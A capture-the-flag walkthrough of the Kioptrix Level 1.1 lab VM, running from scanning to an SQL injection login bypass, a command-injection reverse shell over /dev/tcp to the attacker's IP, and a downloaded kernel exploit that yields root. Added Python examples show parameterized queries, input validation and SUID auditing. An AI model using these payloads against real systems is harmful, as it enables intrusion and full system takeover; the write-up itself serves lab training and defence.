Kioptrix Level 1.1
Lab setup
When importing the VM, first delete every configuration line containing ethernet0 from the .vmx file, then import it and add a single network adapter.
Information gathering
Find the target host IP
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:84:b2:cc, IPv4: 192.168.158.143
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.158.1 00:50:56:c0:00:08 VMware, Inc.
192.168.158.2 00:50:56:e9:30:53 VMware, Inc.
192.168.158.152 00:0c:29:4f:d6:55 VMware, Inc.
192.168.158.254 00:50:56:f2:30:d4 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.954 seconds (131.01 hosts/sec). 4 responded
Scan for open ports
┌──(root㉿kali)-[~]
└─# nmap 192.168.158.152 -sT -p- --min-rate 1000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-24 23:41 CST
Nmap scan report for 192.168.158.152
Host is up (0.0017s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
773/tcp open submit
3306/tcp open mysql
MAC Address: 00:0C:29:4F:D6:55 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
Detailed scan of each port
┌──(root㉿kali)-[~]
└─# nmap 192.168.158.152 -sT -sVC -p22,80,111,443,631,773,3306
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-24 23:44 CST
Nmap scan report for 192.168.158.152
Host is up (0.00026s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 770/udp status
|_ 100024 1 773/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2025-03-24T12:34:43+00:00; -3h09m39s from scanner time.
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp open ipp CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
773/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:4F:D6:55 (VMware)

Host script results:
|_clock-skew: -3h09m39s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Run the vulnerability scripts
┌──(root㉿kali)-[~]
└─# nmap 192.168.158.152 --script=vuln -p22,80,111,443,631,773,3306
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-24 23:50 CST
Nmap scan report for 192.168.158.152
Host is up (0.00023s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.0.52 (centos)'
|_ /manual/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.158.152
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.158.152:80/
| Form id: frmlogin
| Form action: index.php
|
| Path: http://192.168.158.152:80/index.php
| Form id: frmlogin
|_ Form action: index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
111/tcp open rpcbind
443/tcp open https
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: BID:74733 CVE:CVE-2015-4000
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://weakdh.org
| https://www.securityfocus.com/bid/74733
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_http-trace: TRACE is enabled
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.158.152
| Found the following possible CSRF vulnerabilities:
|
| Path: https://192.168.158.152:443/
| Form id: frmlogin
| Form action: index.php
|
| Path: https://192.168.158.152:443/index.php
| Form id: frmlogin
|_ Form action: index.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| http://www.cvedetails.com/cve/2014-0224
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.0.52 (centos)'
|_ /manual/: Potentially interesting folder
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.securityfocus.com/bid/70574
631/tcp open ipp
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
773/tcp open submit
3306/tcp open mysql
MAC Address: 00:0C:29:4F:D6:55 (VMware)
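Triage of the vuln-script output above, as an added example that is not part of the original write-up: a small parser that turns nmap's `|`-prefixed script blocks into structured findings (port, script, title, state, CVE ids), so that a long scan like this one can be tracked in a ticket or diffed against the next scan instead of being read by eye. The excerpt it parses is constructed from the scan above, with nmap's normal indentation restored (the listing on this page has its whitespace collapsed); the function and class names are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt of the `nmap --script=vuln` output above, with nmap's
# normal indentation (this page's copy has the leading spaces collapsed).
SAMPLE_SCAN = """\
80/tcp   open  http
|_http-trace: TRACE is enabled
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
443/tcp  open  https
| ssl-dh-params:
|   VULNERABLE:
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  BID:74733  CVE:CVE-2015-4000
|     Disclosure date: 2015-5-19
|
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|     Check results:
|       WEAK DH GROUP 1
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
631/tcp  open  ipp
"""

PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)")
# A script header sits one space after "|" or "|_"; inner lines are indented deeper.
SCRIPT_RE = re.compile(r"^\|_? (?!https?:)([a-z0-9-]+):\s*(.*)$")
LINE_RE = re.compile(r"^\|_?\s*(.*)$")
STATE_RE = re.compile(r"^State:\s*(.+)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
# Lines that are keys, not the human-readable title of a finding.
NON_TITLE_KEYS = ("VULNERABLE:", "State:", "IDs:", "Risk factor:", "References:",
                  "Check results:", "Disclosure date:")


@dataclass
class Finding:
    port: int
    service: str
    script: str
    title: str
    state: str
    cves: list = field(default_factory=list)


def parse_vuln_findings(text):
    """Return one Finding per 'State:' line, with the title that precedes it and its CVE ids."""
    findings = []
    port = service = script = None
    last_title = None
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:                                   # new port block resets everything
            port, service = int(m.group(1)), m.group(2)
            script, last_title = None, None
            continue
        m = SCRIPT_RE.match(raw)
        if m:                                   # new script block, e.g. "| ssl-poodle:"
            script, last_title = m.group(1), None
            continue
        m = LINE_RE.match(raw)
        if not m or port is None:
            continue
        content = m.group(1).strip()
        if not content:                         # bare "|" separates findings within one script
            last_title = None
            continue
        sm = STATE_RE.match(content)
        if sm:
            findings.append(Finding(port, service, script, last_title or "(untitled)",
                                    sm.group(1).strip()))
            continue
        if content.startswith("IDs:") and findings:
            findings[-1].cves.extend(CVE_RE.findall(content))
            continue
        if not content.startswith(NON_TITLE_KEYS):
            last_title = content                # most recent free-text line becomes the title
    return findings


def cves_by_port(findings):
    """Collapse findings to {port: set of CVE ids} for a quick patch/triage list."""
    out = {}
    for f in findings:
        out.setdefault(f.port, set()).update(f.cves)
    return out


if __name__ == "__main__":
    for f in parse_vuln_findings(SAMPLE_SCAN):
        print(f"{f.port}/{f.service} {f.script}: {f.title} [{f.state}] {', '.join(f.cves) or '-'}")
    print(cves_by_port(parse_vuln_findings(SAMPLE_SCAN)))
```

The parser relies on the indentation nmap emits (script names one space after the bar, everything else deeper), so feed it raw `-oN` output rather than a copy that has been whitespace-collapsed like the one on this page.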
Port 80 information gathering
Directory scan
┌──(root㉿kali)-[~/vulnhub/Kioptrix_Level_1.1]
└─# dirsearch -u http://192.168.158.152/ -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/vulnhub/Kioptrix_Level_1.1/reports/http_192.168.158.152/__25-03-24_23-52-05.txt

Target: http://192.168.158.152/

[23:52:05] Starting:
[23:52:07] 403 - 294B - /.ht_wsr.txt
[23:52:07] 403 - 297B - /.htaccess.bak1
[23:52:07] 403 - 297B - /.htaccess.orig
[23:52:07] 403 - 299B - /.htaccess.sample
[23:52:07] 403 - 297B - /.htaccess_orig
[23:52:07] 403 - 297B - /.htaccess.save
[23:52:07] 403 - 298B - /.htaccess_extra
[23:52:07] 403 - 295B - /.htaccess_sc
[23:52:07] 403 - 295B - /.htaccessBAK
[23:52:07] 403 - 295B - /.htaccessOLD
[23:52:07] 403 - 296B - /.htaccessOLD2
[23:52:07] 403 - 288B - /.html
[23:52:07] 403 - 287B - /.htm
[23:52:07] 403 - 297B - /.htpasswd_test
[23:52:07] 403 - 294B - /.httr-oauth
[23:52:07] 403 - 293B - /.htpasswds
[23:52:19] 403 - 291B - /cgi-bin/
[23:52:23] 403 - 289B - /error/
[23:52:29] 200 - 7KB - /manual/index.html
[23:52:29] 301 - 319B - /manual -> http://192.168.158.152/manual/
[23:52:40] 403 - 288B - /usage
Vulnerability discovery and exploitation
Into the back end with a "universal password" (SQL injection login bypass)
POST /index.php HTTP/1.1
Host: 192.168.158.152
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.158.152
Connection: keep-alive
Referer: http://192.168.158.152/index.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cache

uname=admin&psw=1%27+or+%271%27%3D%271&btnLogin=Login
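Why the request above logs in, and what the fix looks like, as an added example that is not code from the Kioptrix box: the same login check written twice, once by splicing the form fields into the SQL string (the pattern the target's index.php evidently uses) and once with a bound parameter and a salted hash comparison. The database, user and password are constructed in memory; the injected value is the URL-decoded psw field from the captured request. Function names are my own.

```python
import hashlib
import hmac
import os
import sqlite3

# The psw value from the captured request above, URL-decoded.
BYPASS_INPUT = "1' or '1'='1"
# Constructed demo credential for the in-memory database; not from the target.
DEMO_USER, DEMO_PASSWORD = "admin", "demo-password"


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    conn = sqlite3.connect(":memory:")
    # The plaintext column exists only so the vulnerable query has something to
    # compare against; the hardened path uses the salted hash.
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, "
                 "salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                 (DEMO_USER, DEMO_PASSWORD, salt, hash_password(DEMO_PASSWORD, salt)))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # String-built query. With BYPASS_INPUT the WHERE clause becomes
    #   username='admin' AND password='1' or '1'='1'
    # and AND binds tighter than OR, so the trailing OR makes the whole clause true
    # and a row comes back without a valid password.
    sql = f"SELECT username FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, username, password):
    # Bound parameter: the input travels as data and can never change the query's structure.
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, stored_hash = row
    # Constant-time comparison of the salted hash; the plaintext never reaches SQL at all.
    return hmac.compare_digest(hash_password(password, salt), stored_hash)


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, injected input:", login_vulnerable(conn, DEMO_USER, BYPASS_INPUT))  # True
    print("hardened,   injected input:", login_hardened(conn, DEMO_USER, BYPASS_INPUT))    # False
    print("hardened,   real password: ", login_hardened(conn, DEMO_USER, DEMO_PASSWORD))   # True
```

The hardened version also answers a second weakness implied by the vulnerable query: a plaintext password column. With the hash stored instead, even a successful injection elsewhere in the application would not hand over reusable credentials.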
RCE: getting a shell
The classic ping form: a pipe or semicolon after the address runs a second command, here used to spawn a reverse shell.
payload:
127.0.0.1;sh -i >& /dev/tcp/192.168.158.143/1122 0>&1
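The root cause of the ping injection above and its fix, as an added example that is not code from the target (the page shows only the payload, not the PHP handler): one function reproduces the unsafe construction, a string handed to a shell, and the other validates the field as a literal IP address and execs ping with an argument vector, so no shell ever parses the input. The sample input is the payload from this page; `ping_safely` actually runs ping, so it is only called from the demo block. Function names are my own.

```python
import ipaddress
import subprocess

# The field value from the payload above: a literal address followed by a second command.
INJECTED_INPUT = "127.0.0.1;sh -i >& /dev/tcp/192.168.158.143/1122 0>&1"


def vulnerable_command_line(host):
    # What the original form handler effectively does: the raw field is spliced into a
    # command string that a shell then parses, so ';' terminates ping and starts whatever follows.
    return f"ping -c 1 {host}"


def build_ping_argv(host):
    # Strict allow-list: the input must parse as a single literal IP address.
    # Metacharacters, whitespace, hostnames and empty strings all raise ValueError here,
    # before any process exists. ping6 for v6 mirrors the separate /bin/ping6 on this box.
    addr = ipaddress.ip_address(host)
    binary = "ping6" if addr.version == 6 else "ping"
    return [binary, "-c", "1", str(addr)]


def is_valid_target(host):
    # Boolean wrapper around the validator, useful for logging rejected submissions.
    try:
        build_ping_argv(host)
        return True
    except ValueError:
        return False


def ping_safely(host, timeout=5):
    # argv list with shell=False: ping is exec'd directly and each list element is one
    # argument; nothing re-parses the string, so a ';' or '|' could only ever be part of the
    # address, and the validator has already rejected that.
    argv = build_ping_argv(host)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.returncode == 0, proc.stdout


if __name__ == "__main__":
    print("shell would see :", vulnerable_command_line(INJECTED_INPUT))
    print("valid target?   :", is_valid_target(INJECTED_INPUT))   # False
    print("argv            :", build_ping_argv("127.0.0.1"))       # ['ping', '-c', '1', '127.0.0.1']
```

The check is deliberately narrower than "escape the metacharacters": the form only ever needs an address, so anything that is not one is rejected outright, which also gives the application a clean signal to log and alert on.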
Kernel privilege escalation
Find SUID binaries
bash-3.00$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/sbin/unix_chkpwd
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/usr/sbin/ccreds_validate
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/suexec
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/kerberos/bin/ksu
/usr/lib/squid/pam_auth
/usr/lib/squid/ncsa_auth
/usr/bin/chsh
/usr/bin/rcp
/usr/bin/sudo
/usr/bin/chage
/usr/bin/crontab
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/lppasswd
/usr/bin/sg
/usr/bin/passwd
/bin/mount
/bin/traceroute6
/bin/traceroute
/bin/umount
/bin/ping6
/bin/ping
/bin/su
Check the kernel version
bash-3.00$ uname -a
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ lsb_release -a
lsb_release -a
LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description: CentOS release 4.5 (Final)
Release: 4.5
Codename: Final
Search for exploits matching this version
┌──(root㉿kali)-[~/vulnhub/Kioptrix_Level_1.1]
└─# searchsploit Linux 2.6 centos
------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------ ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/1 | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4 | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - | linux_x86-64/local/45516.c
------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
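A defender's version of the last two steps, as an added example that is not part of the original write-up: turn the `uname -a` line into a comparable version and check it against the "< 2.6.19" bound quoted in the searchsploit title above, and record the SUID listing from the box as a baseline so a later `find` run can be diffed against it. The baseline is the listing from this page; the "later" listing with one extra path is constructed to show what the diff reports. Function names are my own.

```python
import re

# Constructed from the `uname -a` output above.
UNAME_LINE = ("Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 "
              "i686 i686 i386 GNU/Linux")
# Upper bound from the searchsploit title "Linux Kernel 2.6 < 2.6.19".
FIXED_IN = (2, 6, 19)

# SUID listing from the box above, kept as the recorded baseline for later comparisons.
BASELINE_SUID = frozenset("""
/sbin/unix_chkpwd /sbin/pam_timestamp_check /sbin/pwdb_chkpwd /usr/sbin/ccreds_validate
/usr/sbin/userhelper /usr/sbin/userisdnctl /usr/sbin/suexec /usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign /usr/libexec/pt_chown /usr/kerberos/bin/ksu
/usr/lib/squid/pam_auth /usr/lib/squid/ncsa_auth /usr/bin/chsh /usr/bin/rcp /usr/bin/sudo
/usr/bin/chage /usr/bin/crontab /usr/bin/rlogin /usr/bin/rsh /usr/bin/gpasswd /usr/bin/at
/usr/bin/newgrp /usr/bin/chfn /usr/bin/lppasswd /usr/bin/sg /usr/bin/passwd /bin/mount
/bin/traceroute6 /bin/traceroute /bin/umount /bin/ping6 /bin/ping /bin/su
""".split())


def parse_kernel_version(uname_output):
    # Third field of `uname -a` is the release, e.g. "2.6.9-55.EL"; keep the numeric triple.
    release = uname_output.split()[2]
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x) for x in m.groups())


def kernel_in_range(version, fixed_in=FIXED_IN):
    # Version-only triage. Enterprise distributions backport fixes without bumping the
    # upstream number, so a hit means "check the vendor errata", not "confirmed vulnerable".
    return version < fixed_in


def parse_find_output(text):
    # Keep only absolute paths; drops the echoed command line and any shell prompt.
    return {line.strip() for line in text.splitlines() if line.strip().startswith("/")}


def audit_suid(current, baseline=BASELINE_SUID):
    # (new SUID files not in the baseline, baseline files that are no longer SUID)
    return set(current) - set(baseline), set(baseline) - set(current)


if __name__ == "__main__":
    v = parse_kernel_version(UNAME_LINE)
    print("kernel", ".".join(map(str, v)), "below", ".".join(map(str, FIXED_IN)),
          "->", kernel_in_range(v))
    # Constructed later listing with one extra entry, to show what the diff reports.
    later = ("find / -type f -perm -4000 2>/dev/null\n" + "\n".join(sorted(BASELINE_SUID))
             + "\n/usr/local/bin/backup\n")
    print("new / missing:", audit_suid(parse_find_output(later)))
```

On this box the version check fires and the exploit run below confirms it, but the comment in `kernel_in_range` is the point: on a patched enterprise kernel the same triple would still be below 2.6.19, so the version test is a prompt to check errata, and the SUID diff is what catches changes the version string cannot show.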
Download, compile, run
bash-3.00$ wget http://192.168.158.143:1100/9542.c
wget http://192.168.158.143:1100/9542.c
--10:06:50-- http://192.168.158.143:1100/9542.c
=> `9542.c'
Connecting to 192.168.158.143:1100... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]

100%[====================================>] 2,535 --.--K/s

10:06:50 (604.39 MB/s) - `9542.c' saved [2535/2535]

bash-3.00$ ls
ls
9542.c linux-exploit-suggester.sh test
bash-3.00$ gcc 9542.c -o test
gcc 9542.c -o test
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
ls
9542.c linux-exploit-suggester.sh test
bash-3.00$ chmod +x test
chmod +x test
bash-3.00$ ./test
./test
sh-3.00# id
id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#
Summary
This box comes down to: weak login -> command execution to get a shell -> kernel privilege escalation.